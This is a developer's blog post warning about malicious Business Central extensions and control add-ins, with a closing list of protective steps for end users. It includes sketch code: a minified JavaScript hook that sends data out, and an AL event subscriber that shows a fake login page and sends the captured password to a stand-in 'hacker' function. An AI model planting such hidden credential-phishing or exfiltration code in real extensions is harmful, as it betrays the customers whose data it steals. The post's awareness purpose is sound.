I feel like this is the elephant in the room that everyone seems to ignore. How to make sure your Business Central extensions are secure. Ever since we moved into extensions our world has become so much bigger, we have API’s, we can call REST webservices from AL. There are so many cool things available, near unlimited possibilities for hackers to steal you data.
I got into a bit of a discussion with someone on LinkedIn after my recent post on React builds in Control Add-Ins. The heart of it was that compiled JavaScript can contain a multitude of nastiness that is near impossible to spot. This is true but it is also true of extensions. In this blog post I will give some examples of nastiness a careless or unscrupulous developer can create.
First things first, compiled JavaScript. Lets say you ask someone to create a script for your Control Add-In. Let’s say that someone uses React and sends you a compiled script. Everything works, looks pretty and you are happy. However, this was added to your JavaScript:
window.InitControls = (myBCData) => {
sendToMyHackerBuddies(myBCData);
processInitControls(myBCData);
}
This, obviously, is a pretty hamfisted example. Easy to spot right? Lets have a look at the compiled code:
window.InitControls=function(e,n){sendToMyHackerBuddies(void 0),p(e)|
Just to give you some context, this particular file holds a single line of 3331 characters of nearly illegible JavsScript. It is impossible to find even this hamfisted example if you don’t know where to look. What if your developer decided to call a function in some piece of script someone posted somewhere? You simply won’t find it.
Second example. You ask someone to create an extension for you. They build it, you test it, everything works, everyone happy right? But what if that developer added this event subscriber and then set ShowMyCode to false?
[EventSubscriber(ObjectType::Table, Database::Customer, 'OnAfterInsertEvent', '', true, true)] local procedure CustomerOnInsert(var Rec: Record Customer; RunTrigger: Boolean) var User: Record User; FakeLoginpage: Page "Fake Login Page"; Password: Text; begin if User.Get(UserSecurityId()) then; FakeLoginpage.RunModal(); Password := FakeLoginPage.GetPassword(); SendToMyHackerBuddies(Rec, UserId, GetUrl(ClientType::Api), User."Authentication Email", Password); end;
Disaster right? You are one fishing trip away from exposing your entire database to god knows who. What if you simply downloaded an extension someone posted somewhere thinking it would fix your problems?
Third scenario, you call a webservice in order to find the weather conditions on your customers location. Instead of finding a premium trusted API you use the free service you find on webservice.weather.myfriendlyhacker.com/api. It will no doubt return perfectly valid weather data. It will also log all your data and sell it to the highest bidder.
I hope these simple scenarios make you think twice about trust and ease of development. Please remember that Business Central is probably not big enough to be targeted by the really really clever Internet criminals. That will change.
Now for the million dollar question. Will this stop me from using React front ends, extensions, and web services. Of course not. They bring us many good things. But I am mindful of who to trust. I don’t just add any old scripts to my front ends, and I certainly don’t send customer data to random web services.
To my fellow developers, your customers trust you to keep their data secure. Please be mindful of this, earn their trust.
To end users. There are a few simple ways of protecting yourselves.
- Work only with developers that you know and trust
- Never install extensions from untrusted sources
- When you commission someone to create a per tenant extension insist that the source code is visible
- Where possible insist that code is reviewed by an independent third party
- Set up your security properly.
- When in doubt, don’t.
What do you use to protect yourselves? Please let me know in the comments.
Photo by Sam Balye on Unsplash
Red and Bundle 
Thanks forr sharing
LikeLike